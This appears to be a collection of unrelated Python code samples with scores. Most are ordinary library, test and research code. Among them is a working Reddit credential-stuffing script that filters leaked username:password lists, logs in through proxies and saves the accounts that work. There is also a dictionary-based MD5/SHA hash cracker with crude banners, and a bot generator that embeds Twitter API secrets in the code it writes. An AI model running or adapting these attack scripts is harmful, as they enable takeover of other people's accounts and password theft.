end, employee, company): applicable_holiday_list = frappe.db.get_value("Employee", employee, "holiday_list") if not applicable_holiday_list: return for holiday in frappe.db.sql("""select name, holiday_date, description from `tabHoliday` where parent=%s and holiday_date between %s and %s""", (applicable_holiday_list, start, end), as_dict=True): events.append({ "doctype": "Holiday", "from_date": holiday.holiday_date, "title": _("Holiday") + ": " + cstr(holiday.description), "name": holiday.name })
0.026586
from nipype.testing import assert_equal from nipype.interfaces.fsl.model import FILMGLS, FILMGLSInputSpec def test_filmgls(): input_map = dict(args = dict(argstr='%s',), autocorr_estimate_only = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='-ac',), autocorr_noestimate = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='-noest',), brightness_threshold = dict(argstr='-epith %d',), design_file = dict(argstr='%s',), environ = dict(usedefault=True,), fit_armodel = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='-ar',), full_data = dict(argstr='-v',), ignore_exception = dict(usedefault=True,), in_file = dict(mandatory=True,argstr='%s',), mask_size = dict(argstr='-ms %d',), multitaper_product = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='-mt %d',), output_pwdata = dict(argstr='-output_pwdata',), output_type = dict(), results_dir = dict(usedefault=True,argstr='-rn %s',), smooth_autocorr = dict(argstr='-sa',), threshold = dict(argstr='%f',), tukey_window = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='-tukey %d',), use_pava = dict(argstr='-pava',), ) input_map2 = dict(args = dict(argstr='%s',), autocorr_estimate_only = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='--ac',), autocorr_noestimate = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='--noest',), brightness_threshold = dict(argstr='--epith=%d',), design_file = dict(argstr='--pd=%s',), environ = dict(usedefault=True,), fit_armodel = 
dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='--ar',), full_data = dict(argstr='-v',), ignore_exception = dict(usedefault=True,), in_file = dict(mandatory=True,argstr='--in=%s',), mask_size = dict(argstr='--ms=%d',), multitaper_product = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='--mt=%d',), output_pwdata = dict(argstr='--outputPWdata',), output_type = dict(), results_dir = dict(argstr='--rn=%s',usedefault=True,), smooth_autocorr = dict(argstr='--sa',), terminal_output = dict(), threshold = dict(usedefault=True,argstr='--thr=%f',), tukey_window = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='--tukey=%d',), use_pava = dict(argstr='--pava',), ) instance = FILMGLS() if isinstance(instance.inputs, FILMGLSInputSpec): for key, metadata in input_map.items(): for metakey, value in metadata.items(): yield assert_equal, getattr(instance.inputs.traits()[key], metakey), value else: for key, metadata in input_map2.items(): for metakey, value in metadata.items(): yield assert_equal, getattr(instance.inputs.traits()[key], metakey), value
0.034524
#!/usr/bin/env python3 import pge, sys from pygame.locals import * print("starting tiny") # pge.batch () pge.interactive () t = pge.rgb (1.0/2.0, 2.0/3.0, 3.0/4.0) wood_light = pge.rgb (166.0/256.0, 124.0/256.0, 54.0/256.0) wood_dark = pge.rgb (76.0/256.0, 47.0/256.0, 0.0) red = pge.rgb (1.0, 0.0, 0.0) green = pge.rgb (0.0, 1.0, 0.0) blue = pge.rgb (0.0, 0.0, 1.0) blue_dark = pge.rgb (0.1, 0.1, 0.8) steel = pge.rgb (0.5, 0.5, 0.5) copper = pge.rgb (0.5, 0.3, 0.2) gold = pge.rgb (0.8, 0.6, 0.15) ball_size = 0.02 boarder = 0.01 white = pge.rgb (1.0, 1.0, 1.0) gap = 0.01 captured = None sides = [] yellow = pge.rgb (0.8, 0.6, 0.15) def myquit (e): print("goodbye") sys.exit (0) def key_pressed (e): if e.key == K_ESCAPE: myquit (e) def placeBoarders (thickness, color): print("placeBoarders") e1 = pge.box (0.0, 0.0, 1.0, thickness, color).fix () e2 = pge.box (0.0, 0.0, thickness, 1.0, color).fix () e3 = pge.box (1.0-thickness, 0.0, thickness, 1.0, color).fix () e4 = pge.box (0.0, 1.0-thickness, 1.0, thickness, color).fix () return e1, e2, e3, e4 def placeBall (kind, x, y, r): return pge.circle (x, y, r, kind) def main (): global gb, sb, sides placeBoarders (0.01, wood_dark) sb = placeBall (wood_light, 0.25, 0.85, 0.02).mass (0.1) gb = placeBall (steel, 0.4, 0.9, 0.01).mass (1.0) print("before run") pge.record () pge.draw_collision (True, False) pge.collision_colour (red) pge.gravity () pge.dump_world () pge.slow_down (6.0) # slows down real time by a factor of pge.register_handler (myquit, [QUIT]) pge.register_handler (key_pressed, [KEYDOWN]) pge.display_set_mode ([1000, 1000]) pge.run (10.0) pge.finish_record () print("before main()") main ()
0.029034
import aiohttp import asyncio import sys import random import time from aiohttp import ProxyConnector from aiohttp import ClientSession global valids global finished finished = [] valids = [] sys.argv = ['', 'test.txt', 'proxies.txt', 'out.txt'] async def login(username, password, karma, comment_karma, number, measure, last_number, last_measure, proxies): global finished while True: try: proxy = random.choice(proxies).strip().rstrip() #conn = ProxyConnector(proxy="http://{0}".format(proxy)) async with ClientSession() as session: async with session.post('https://www.reddit.com/api/login/{0}'.format(username), data={ 'op':'login-main', 'user':username, 'passwd':password, 'api_type':'json', } ) as login: resJSON = await login.json() if len(resJSON['json']['errors']) == 1: return False else: pass async with session.get('https://www.reddit.com/prefs/update/') as request: resp = await request.read() resp = resp.decode('utf-8') if '(verification pending;' in resp or 'Your account has been locked due to possible password compromise' in resp: return False else: pass async with session.get('https://www.reddit.com/account-activity') as request: resp = await request.read() resp = resp.decode('utf-8') if 'Create your own subreddit' in resp: canCreate = True else: canCreate = False finished.append('{0}:{1}:{2}:{3}:{4}{5}:{6}{7}:{8}'.format(username, password, karma, comment_karma, number, measure, last_number, last_measure, canCreate)) print('{0}:{1}:{2}:{3}:{4}{5}:{6}{7}:{8}'.format(username, password, karma, comment_karma, number, measure, last_number, last_measure, canCreate)) print('{0}:{1}:{2}:{3}:{4}{5}:{6}{7}:{8}'.format(username, password, karma, comment_karma, number, measure, last_number, last_measure, canCreate), file=open(sys.argv[3], 'a')) return True #print('{0}:{1}:{2}:{3}:{4}{5}:{6}{7}'.format(username, password, karma, comment_karma, number, measure, last_number, last_measure)) except Exception: continue async def scrape(url, session, username, password): global 
valids print(url) async with session.get(url) as resp: response = await resp.read() response = response.decode('utf-8') try: if '<span class="trophy-name">Verified Email</span>' in response: return False karma = response.split('<span class="karma">')[1].split('</span>')[0] comment_karma = response.split('<span class="karma comment-karma">')[1].split('</span>')[0] age = response.split('<span class="age">')[1].split('</span>')[0].split('>')[1].replace('</time', '') number, measure = age.split(' ') if measure != 'years': return False try: last_number, last_measure, ago = response.split('class="live-timestamp">')[1].split('</time>')[0].split(' ') if last_measure != 'years': return False except: last_number, last_measure = ['None', ''] valids.append([username, password, karma, comment_karma, number, measure, last_number, last_measure]) #print('{0}:{1}:{2}:{3}:{4}{5}:{6}{7}'.format(username, password, karma, comment_karma, number, measure, last_number, last_measure)) return True except: return False async def bound_scrape(url, session, sem, username, password): async with sem: await scrape(url, session, username, password) async def start(): global valids proxies = open(sys.argv[2], 'r').readlines() reddits = open(sys.argv[1], 'r').readlines() tasks = [] base_url = 'https://www.reddit.com/user/{0}' sem = asyncio.Semaphore(4096) async with ClientSession() as session: for account in reddits: if account.strip().rstrip() != '': pass else: continue if len(account.strip().rstrip().split(':')) > 2: continue username, password = account.strip().rstrip().split(':') task = asyncio.ensure_future(bound_scrape(base_url.format(username), session, sem, username, password)) tasks.append(task) responses = asyncio.gather(*tasks) await responses print('Down to {0} accounts.'.format(len(valids))) return tasks = [] for account in valids: task = asyncio.ensure_future(login(account[0], account[1], account[2], account[3], account[4], account[5], account[6], account[7], proxies)) 
tasks.append(task) responses = asyncio.gather(*tasks) await responses print('Down to {0} accounts && finished.'.format(len(finished))) print(finished) if __name__ == "__main__": loop = asyncio.get_event_loop() future = asyncio.ensure_future(start()) loop.run_until_complete(future)
0.02885
''' Tests SoledadClient/SQLCipher interaction ''' import pytest from twisted.internet.defer import gatherResults def load_up(client, amount, payload, defer=True): results = [client.create_doc({'content': payload}) for _ in xrange(amount)] if defer: return gatherResults(results) def build_test_sqlcipher_async_create(amount, size): @pytest.inlineCallbacks @pytest.mark.benchmark(group="test_sqlcipher_async_create") def test(soledad_client, txbenchmark_with_setup, payload): """ Create many documents of a given size concurrently. """ client = soledad_client() yield txbenchmark_with_setup( lambda: None, load_up, client, amount, payload(size)) return test def build_test_sqlcipher_create(amount, size): @pytest.mark.skip(reason="this test is lengthy and not a real use case") @pytest.mark.benchmark(group="test_sqlcipher_create") def test(soledad_client, monitored_benchmark, payload): """ Create many documents of a given size serially. """ client = soledad_client()._dbsyncer monitored_benchmark( load_up, client, amount, payload(size), defer=False) return test test_async_create_10_1000k = build_test_sqlcipher_async_create(10, 1000 * 1000) test_async_create_100_100k = build_test_sqlcipher_async_create(100, 100 * 1000) test_async_create_1000_10k = build_test_sqlcipher_async_create(1000, 10 * 1000) # synchronous test_create_10_1000k = build_test_sqlcipher_create(10, 1000 * 1000) test_create_100_100k = build_test_sqlcipher_create(100, 100 * 1000) test_create_1000_10k = build_test_sqlcipher_create(1000, 10 * 1000)
0
import sys from services.spawn import MobileTemplate from services.spawn import WeaponTemplate from resources.datatables import WeaponType from resources.datatables import Difficulty from resources.datatables import Options from java.util import Vector def addTemplate(core): mobileTemplate = MobileTemplate() mobileTemplate.setCreatureName('bearded_jax') mobileTemplate.setLevel(37) mobileTemplate.setDifficulty(Difficulty.NORMAL) mobileTemplate.setMinSpawnDistance(4) mobileTemplate.setMaxSpawnDistance(8) mobileTemplate.setDeathblow(False) mobileTemplate.setScale(1) mobileTemplate.setMeatType("Herbivore Meat") mobileTemplate.setMeatAmount(15) mobileTemplate.setHideType("Bristley Hide") mobileTemplate.setHideAmount(15) mobileTemplate.setBoneType("Animal Bones") mobileTemplate.setBoneAmount(10) mobileTemplate.setSocialGroup("jax") mobileTemplate.setAssistRange(4) mobileTemplate.setStalker(False) mobileTemplate.setOptionsBitmask(Options.ATTACKABLE) templates = Vector() templates.add('object/mobile/shared_bearded_jax.iff') mobileTemplate.setTemplates(templates) weaponTemplates = Vector() weapontemplate = WeaponTemplate('object/weapon/melee/unarmed/shared_unarmed_default.iff', WeaponType.UNARMED, 1.0, 6, 'kinetic') weaponTemplates.add(weapontemplate) mobileTemplate.setWeaponTemplateVector(weaponTemplates) attacks = Vector() attacks.add('bm_claw_3') attacks.add('bm_flank_1') attacks.add('bm_slash_3') mobileTemplate.setDefaultAttack('creatureMeleeAttack') mobileTemplate.setAttacks(attacks) core.spawnService.addMobileTemplate('bearded_jax', mobileTemplate) return
0.026914
import sys import os ######################################## #Check Input Error ######################################## if len(sys.argv) != 5: print "Input Error!" print "Usage:" print "xx.py <Build mode: Homogeneous 0 / Heterogeneous 1> <Application Name> <Number of Groups> <Number of Slaves per Group>" quit() mode = int(sys.argv[1]) appName = sys.argv[2] numGroup = int(sys.argv[3]) numSlave = int(sys.argv[4]) currDict = os.getcwd()+"/" currDict = currDict[10:len(currDict)] currDict = currDict[0]+":"+currDict[1:len(currDict)] if mode == 0: cmd = "data2mem.bat -bm " + currDict + appName + "/system_wrapper_hw_platform_0/system_wrapper_bd.bmm " cmd = cmd + "-bt " + currDict + appName + "/system_wrapper_hw_platform_0/system_wrapper.bit " #Host cmd = cmd + "-bd " + currDict + appName + "/Host/Debug/Host.elf " cmd = cmd + "tag system_i_Host " #Slaves for i in range(0,numGroup): for j in range(0,numSlave): each = "Slave" processor = "Slave"+str(j)+"_Group"+str(i) cmd = cmd + "-bd " + currDict + appName + "/" + each + "/Debug/" + each + ".elf " cmd = cmd + "tag system_i_" + processor + " " cmd = cmd + "-o b " + currDict + appName + "/system_wrapper_hw_platform_0/download.bit" os.system(cmd) tclArg = currDict+appName cmd = "vivado -mode batch -source ./program.tcl -tclargs " + tclArg os.system(cmd) quit() ########################################## #Create download.bit ########################################## cmd = "data2mem.bat -bm " + currDict + appName + "/system_wrapper_hw_platform_0/system_wrapper_bd.bmm " cmd = cmd + "-bt " + currDict + appName + "/system_wrapper_hw_platform_0/system_wrapper.bit " #Host cmd = cmd + "-bd " + currDict + appName + "/Host/Debug/Host.elf " cmd = cmd + "tag system_i_Host " #Salves for i in range(0,numGroup): for j in range(0,numSlave): each = "Slave"+str(j)+"_Group"+str(i) cmd = cmd + "-bd " + currDict + appName + "/" + each + "/Debug/" + each + ".elf " cmd = cmd + "tag system_i_" + each + " " cmd = cmd + "-o b " + currDict + appName + 
"/system_wrapper_hw_platform_0/download.bit" os.system(cmd) tclArg = currDict+appName cmd = "vivado -mode batch -source ./program.tcl -tclargs " + tclArg os.system(cmd)
0.025088
# -*- coding:utf-8 -*- import zipfile import os.path import os import shutil class MakeBot: def __init__(self, auth): self.auth=auth self.dirname='' def makeZip(self, tweetFilePath): # tweetFilePath like .../tmp/RANDOM/tweetFile abspath f = open(tweetFilePath, "r") tweetsList = [] for line in f: tweetsList.append("'"+line[:-1]+"'") tweets = ",".join(tweetsList) f.close() code = """ import tweepy import random CONSUMER_KEY='{consumerKey}' CONSUMER_SECRET='{consumerSecret}' ACCESS_TOKEN='{accessToken}' ACCESS_TOKEN_SECRET='{accessTokenSecret}' tweets = [{tweets}] auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET) auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET) api = tweepy.API(auth) def tweet(): rand = random.randint(0,len(tweets)-1) tweet = tweets[rand] api.update_status(status=tweet) """.format(consumerKey=self.auth.consumer_key.decode('utf-8'), consumerSecret=self.auth.consumer_secret.decode('utf-8'), accessToken=self.auth.access_token, accessTokenSecret=self.auth.access_token_secret, tweets=tweets) dirname = os.path.dirname(tweetFilePath) self.dirname=dirname # dirname like .../tmp/RANDOM shutil.copytree('templates', dirname+'/bot') f = open(dirname+'/bot/bot.py', "w") f.write(code) f.close() zip = zipfile.ZipFile(dirname+"/"+os.path.basename(dirname)+".zip", "w", zipfile.ZIP_DEFLATED) files = os.listdir(dirname+'/bot') for f in files: zip.write(dirname+'/bot/'+f, 'bot/'+f) zip.close() def deleteFiles(self): os.rmdir(self.dirname) def getDirPath(self): return self.dirname
0.025253
#!/usr/bin/python # dpc-hashcrack.py v1.0 # offline cracking tools for md5,sha1,sha224,sha256,sha384,sha512 using # Crochemore-Perrin algorithm /w multiprocessing module. List dictionary will # be divided of 2 parts. reading string list from top to bottom and bottom # to top until the middle position of the number of strings, to increase # the probability and effectiveness discover of the password # # c0der: ch3cksum <ch3cksum@depredac0de.net> # special thx to: 5ynL0rd,xco,Dr_EIP,gat3w4y,pyfla,acayz,B4dJoe,blackend, # g4pt3k,qrembiezs,boys_rvn1609,Unixc0de # special thx community: darkc0de & antijasakom # # depredac0de.net <underground network security research group> #****************************************************************************************** import multiprocessing,hashlib,sys,os def md5(hash): climax = hashlib.md5(hash).hexdigest() return climax def sha1(hash): climax = hashlib.sha1(hash).hexdigest() return climax def sha224(hash): climax = hashlib.sha224(hash).hexdigest() return climax def sha256(hash): climax = hashlib.sha256(hash).hexdigest() return climax def sha384(hash): climax = hashlib.sha384(hash).hexdigest() return climax def sha512(hash): climax = hashlib.sha512(hash).hexdigest() return climax def getbigdick(penis): try: pussy = open(penis,'r') licker = pussy.readlines() c1 = 0 while c1 < len(licker): licker[c1] = licker[c1].strip() c1 += 1 except IOError: print "[-] Your file cannot be suck!" 
%penis exit() else: cek = len(licker) print "[+] %s word loaded" %cek return licker def toptobottom(crack): i = 0 while i < (len(asshole)/2): if len(crack) == 32: if crack == md5(asshole[i]): print "\n\t[p1] 3===D passwd is = %s\n"%asshole[i] break elif len(crack) == 40: if crack == sha1(asshole[i]): print "\n\t[p1] 3===D passwd is = %s\n"%asshole[i] break elif len(crack) == 56: if crack == sha224(asshole[i]): print "\n\t[p1] 3===D passwd is = %s\n"%asshole[i] break elif len(crack) == 64: if crack == sha256(asshole[i]): print "\n\t[p1] 3===D passwd is = %s\n"%asshole[i] break elif len(crack) == 96: if crack == sha384(asshole[i]): print "\n\t[p1] 3===D passwd is = %s\n"%asshole[i] break elif len(crack) == 128: if crack == sha512(asshole[i]): print "\n\t[p1] 3===D passwd is = %s\n"%asshole[i] break else: print "[-] not support hash" sys.exit() i += 1 def bottomtotop(crack): k = 0 big = len(asshole) - len(asshole)/2 while k < (big): if len(crack) == 32: if crack == md5(asshole[-k]): print "\n\t[p2] 3===D passwd is = %s\n"%asshole[-k] break elif len(crack) == 40: if crack == sha1(asshole[-k]): print "\n\t[p2] 3===D passwd is = %s\n"%asshole[-k] break elif len(crack) == 56: if crack == sha224(asshole[-k]): print "\n\t[p2] 3===D passwd is = %s\n"%asshole[-k] break elif len(crack) == 64: if crack == sha256(asshole[-k]): print "\n\t[p2] 3===D passwd is = %s\n"%asshole[-k] break elif len(crack) == 96: if crack == sha384(asshole[-k]): print "\n\t[p2] 3===D passwd is = %s\n"%asshole[-k] break elif len(crack) == 128: if crack == sha512(asshole[-k]): print "\n\t[p2] 3===D passwd is = %s\n"%asshole[-k] break else: sys.exit() k += 1 def banner(): header = ''' _______________________________________________________________________ dpc-hashcrack.py v1.0 "Take di*k out 3===D x" .-. (/^\) (\ /) .-'-. 
/(_I_)\ \\\\) (// / v \ \ | / \|/ /|\ \|/ /Y\\ c0der: ch3cksum <ch3cksum@depredac0de.net> special thx to: 5ynL0rd,xco,Dr_EIP,gat3w4y,pyfla,acayz,B4dJoe,blackend, g4pt3k,qrembiezs,boys_rvn1609,Unixc0de ________________________________________________________________________''' print header if __name__=="__main__": if os.name == "posix": refresh = "clear" else: refresh = "cls" os.system(refresh) banner() fuckit = raw_input("[+] Enter the Fuckin hash: ") dick = raw_input("[+] Enter dick file: ") asshole = getbigdick(dick) p1 = multiprocessing.Process(target=toptobottom, args=[fuckit]) p2 = multiprocessing.Process(target=bottomtotop, args=[fuckit]) p1.start() p2.start() while 1: if p1.is_alive()==False: p2.terminate() print "\n" break if p2.is_alive()==False: p1.terminate() print "\n" break
0.05545
# -*- coding: utf-8 -*- #imports the NCBI_utils lib containing the functions for GI accession and BLAST import MG_synth_lib as MGlib #random number generation import random #mean and std from numpy import mean from numpy import std #normal dist from scipy.stats import norm #system calls import sys #set default parameters motif_filename="CsoR.txt" #input file out_filename="_o" #o prefix for output verbose=0 #verbose mode alpha=1.0/300.0 #mixing ratio for regulated model rproms=3.0 #number of regulated promoters [prior] tproms=1811.0 #total number of promoters in genome [prior] experiment=2 #the experiment number out_filename=motif_filename.split(".")[0] + out_filename + str(experiment) #verbose if verbose: print "Using: ", motif_filename, " as input" if verbose: print "Writing to (suffix): ", "[void]" if out_filename==""\ else out_filename #open files for ouput try: out_file = open(out_filename + ".csv","w") except (IOError, OSError) as file_open_exception: print "*** Something went wrong while opening the output file" print "*** Error: ", file_open_exception.errno, " - ",\ file_open_exception.strerror sys.exit() #compute priors PR=rproms/tproms #prior probability of regulation PB=1.0-PR #prior probability of non-regulation PPR=PB/PR #prior probability ratio #read motif and assing 0.25 pseudocounts to PSWM #also assign background uniform distribution for the PSSM (default) mot = MGlib.read_motif(motif_filename) mot.pseudocounts=1 mot.background=None #save the pssm for the motif and the reverse complement #(so that they are not recalculated everytime we invoke motif.pssm) pssm = mot.pssm rpssm = pssm.reverse_complement() #------------------------------------------------------------------------- #Experiment 2: #Using 100 sequences, with 12 sites inserted #get normalizazed probability #do this for 2, 3, 4, 5, 6 and 8 stdevs below mean #repeat 1000 times random.seed(None) verbose=1 #write csv header out_file.write('Theta,Ins_sites,Post,Pass_filt_seqs,Def_post\n') #loop 
experiments for cnt in range(0,1000): print "Experiment: ", cnt #in each experiment, create dataset with 100 seqs, sz with sites inserted for cnt2 in range(0,1): #create background sequence set: 100 seqs 283 bp long set1 = MGlib.random_DNA(283,{'A': 0.3,'C': 0.2,'G': 0.2,'T': 0.3},100) #compute softmax scores for background sequences in dataset gscr = MGlib.esfmax_score_seqs(set1,pssm,rpssm) #compute softmax scores for motif sequences mscr = MGlib.esfmax_score_seqs(mot.instances,pssm,rpssm) #get normal distributions for background and motif n_g=norm(mean(gscr), std(gscr)) n_m=norm(mean(mscr), std(mscr)) #create motif instances pmot1 = MGlib.sample_motif(mot,250) #determine dataset size if (cnt2==0): sz=12 #insert sites in sequences e=0 while (e<len(set1)): #insert random site in first 10 sequences if (e<sz+1): set1[e] = random.choice(pmot1) + set1[e] #otherwise insert random sequence from own sequence start else : set1[e] = set1[e][:17] + set1[e] e = e+1 #compute softmax scores for sequences in dataset scrs1=MGlib.esfmax_score_seqs(set1,pssm,rpssm) #perform calculations for each theta value for cnt3 in range(0,6): if (cnt3==0): theta=-8 elif (cnt3==1): theta=-6 elif (cnt3==2): theta=-5 elif (cnt3==3): theta=-4 elif (cnt3==4): theta=-3 else: theta=-2 #NORMALIZATION #compute effective cutoff (th) value given theta th = MGlib.ThetaTh(theta,n_m) if verbose: print "Effective cut-off: ", th #compute revised priors (assuming 300 bp average length) aPR, aPB = MGlib.NormPriors(th, n_g, n_m, alpha, rproms,\ tproms, promlen=300.0) #get revised prior ratio aPPR = aPB/aPR #FILTER sequences not matching theta #get list of sequences with min score > th Nscrs1 = [x for x in scrs1 if max(x)>=th] if verbose: print "Length of post-theta bckg seqs: ", len(Nscrs1) #get log-likelihoods for sequences in dataset Nllrs1=MGlib.ll_ratios(Nscrs1,n_g,n_m,alpha) #get normalization factors Nnormfs1=MGlib.lNormFactor(Nscrs1, th, n_g, n_m, alpha) #get overall normalized posterior for the sequences 
in dataset Nposts1=MGlib.NormPostP(Nllrs1,aPPR,Nnormfs1,0) if verbose: print theta, " - ", sz, " - ", Nposts1, " - ", \ len(Nscrs1), 1/(1+aPPR) #write results to file out_file.write(str(theta)) out_file.write(',') out_file.write(str(sz)) out_file.write(',') out_file.write(str(Nposts1)) out_file.write(',') out_file.write(str(len(Nscrs1))) out_file.write(',') out_file.write(str(1/(1+aPPR))) out_file.write('\n') out_file.close()
0.025605
import urlparse
from functools import wraps

from django.conf import settings
from django.contrib import messages
from django.shortcuts import render
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.core.exceptions import PermissionDenied
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.views import redirect_to_login


def staff_member_required(view_func, login_url=None):
    """
    Ensure that the user is a logged-in staff member.

    * If not authenticated, redirect to a specified login URL.
    * If not staff, show a 403 page

    This decorator is based on the decorator with the same name from
    django.contrib.admin.view.decorators.  This one is superior as it
    allows a redirect URL to be specified.
    """
    if login_url is None:
        # Plain attribute access: a default-less getattr() raises the same
        # AttributeError anyway, so spell it the idiomatic way.
        login_url = settings.LOGIN_URL

    @wraps(view_func)
    def _checklogin(request, *args, **kwargs):
        if request.user.is_active and request.user.is_staff:
            # Active staff member: let the view run.
            return view_func(request, *args, **kwargs)

        # If user is not logged in, redirect to login page
        if not request.user.is_authenticated():
            # If the login url is the same scheme and net location then just
            # use the path as the "next" url.
            path = request.build_absolute_uri()
            login_scheme, login_netloc = urlparse.urlparse(login_url)[:2]
            current_scheme, current_netloc = urlparse.urlparse(path)[:2]
            if ((not login_scheme or login_scheme == current_scheme) and
                    (not login_netloc or login_netloc == current_netloc)):
                path = request.get_full_path()

            messages.warning(request, _("You must log in to access this page"))
            return redirect_to_login(path, login_url, REDIRECT_FIELD_NAME)
        else:
            # Authenticated but not (active) staff: hard 403.
            raise PermissionDenied

    return _checklogin


def login_forbidden(view_func, template_name='login_forbidden.html',
                    status=403):
    """
    Only allow anonymous users to access this view.

    Authenticated users are shown `template_name` with the given HTTP
    `status` instead of the wrapped view.
    """
    @wraps(view_func)
    def _checklogin(request, *args, **kwargs):
        if not request.user.is_authenticated():
            return view_func(request, *args, **kwargs)

        return render(request, template_name, status=status)

    return _checklogin
0
""" Offer template automation rules. For more details about this automation rule, please refer to the documentation at https://home-assistant.io/components/automation/#template-trigger """ import logging import voluptuous as vol from homeassistant.core import callback from homeassistant.const import CONF_VALUE_TEMPLATE, CONF_PLATFORM from homeassistant.helpers import condition from homeassistant.helpers.event import async_track_state_change import homeassistant.helpers.config_validation as cv _LOGGER = logging.getLogger(__name__) TRIGGER_SCHEMA = IF_ACTION_SCHEMA = vol.Schema({ vol.Required(CONF_PLATFORM): 'template', vol.Required(CONF_VALUE_TEMPLATE): cv.template, }) def async_trigger(hass, config, action): """Listen for state changes based on configuration.""" value_template = config.get(CONF_VALUE_TEMPLATE) value_template.hass = hass # Local variable to keep track of if the action has already been triggered already_triggered = False @callback def state_changed_listener(entity_id, from_s, to_s): """Listen for state changes and calls action.""" nonlocal already_triggered template_result = condition.async_template(hass, value_template) # Check to see if template returns true if template_result and not already_triggered: already_triggered = True hass.async_run_job(action, { 'trigger': { 'platform': 'template', 'entity_id': entity_id, 'from_state': from_s, 'to_state': to_s, }, }) elif not template_result: already_triggered = False return async_track_state_change(hass, value_template.extract_entities(), state_changed_listener)
0
# -*- coding: utf-8 -*- # Generated by Django 1.11.7 on 2018-04-05 21:26 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('portal', '0019_auto_20171214_1538'), ] operations = [ # migrations.AddField( # model_name='ensemblassembly', # name='division', # field=models.CharField(db_index=True, max_length=20, null=True), # ), # migrations.AddField( # model_name='ensemblassembly', # name='ensembl_url', # field=models.CharField(db_index=True, max_length=100, null=True), # ), # migrations.AlterField( # model_name='ensemblassembly', # name='common_name', # field=models.CharField(db_index=True, max_length=255, null=True), # ), migrations.AddField( model_name='ensemblassembly', name='example_chromosome', field=models.CharField(max_length=20, null=True), ), migrations.AddField( model_name='ensemblassembly', name='example_end', field=models.IntegerField(null=True), ), migrations.AddField( model_name='ensemblassembly', name='example_start', field=models.IntegerField(null=True), ), ]
0
"""Trust-region optimization.""" from __future__ import division, print_function, absolute_import import math import numpy as np import scipy.linalg from .optimize import (_check_unknown_options, wrap_function, _status_message, OptimizeResult) __all__ = [] class BaseQuadraticSubproblem(object): """ Base/abstract class defining the quadratic model for trust-region minimization. Child classes must implement the ``solve`` method. Values of the objective function, jacobian and hessian (if provided) at the current iterate ``x`` are evaluated on demand and then stored as attributes ``fun``, ``jac``, ``hess``. """ def __init__(self, x, fun, jac, hess=None, hessp=None): self._x = x self._f = None self._g = None self._h = None self._g_mag = None self._cauchy_point = None self._newton_point = None self._fun = fun self._jac = jac self._hess = hess self._hessp = hessp def __call__(self, p): return self.fun + np.dot(self.jac, p) + 0.5 * np.dot(p, self.hessp(p)) @property def fun(self): """Value of objective function at current iteration.""" if self._f is None: self._f = self._fun(self._x) return self._f @property def jac(self): """Value of jacobian of objective function at current iteration.""" if self._g is None: self._g = self._jac(self._x) return self._g @property def hess(self): """Value of hessian of objective function at current iteration.""" if self._h is None: self._h = self._hess(self._x) return self._h def hessp(self, p): if self._hessp is not None: return self._hessp(self._x, p) else: return np.dot(self.hess, p) @property def jac_mag(self): """Magniture of jacobian of objective function at current iteration.""" if self._g_mag is None: self._g_mag = scipy.linalg.norm(self.jac) return self._g_mag def get_boundaries_intersections(self, z, d, trust_radius): """ Solve the scalar quadratic equation ||z + t d|| == trust_radius. This is like a line-sphere intersection. Return the two values of t, sorted from low to high. 
""" a = np.dot(d, d) b = 2 * np.dot(z, d) c = np.dot(z, z) - trust_radius**2 sqrt_discriminant = math.sqrt(b*b - 4*a*c) # The following calculation is mathematically # equivalent to: # ta = (-b - sqrt_discriminant) / (2*a) # tb = (-b + sqrt_discriminant) / (2*a) # but produce smaller round off errors. # Look at Matrix Computation p.97 # for a better justification. aux = b + math.copysign(sqrt_discriminant, b) ta = -aux / (2*a) tb = -2*c / aux return sorted([ta, tb]) def solve(self, trust_radius): raise NotImplementedError('The solve method should be implemented by ' 'the child class') def _minimize_trust_region(fun, x0, args=(), jac=None, hess=None, hessp=None, subproblem=None, initial_trust_radius=1.0, max_trust_radius=1000.0, eta=0.15, gtol=1e-4, maxiter=None, disp=False, return_all=False, callback=None, **unknown_options): """ Minimization of scalar function of one or more variables using a trust-region algorithm. Options for the trust-region algorithm are: initial_trust_radius : float Initial trust radius. max_trust_radius : float Never propose steps that are longer than this value. eta : float Trust region related acceptance stringency for proposed steps. gtol : float Gradient norm must be less than `gtol` before successful termination. maxiter : int Maximum number of iterations to perform. disp : bool If True, print convergence message. This function is called by the `minimize` function. It is not supposed to be called directly. 
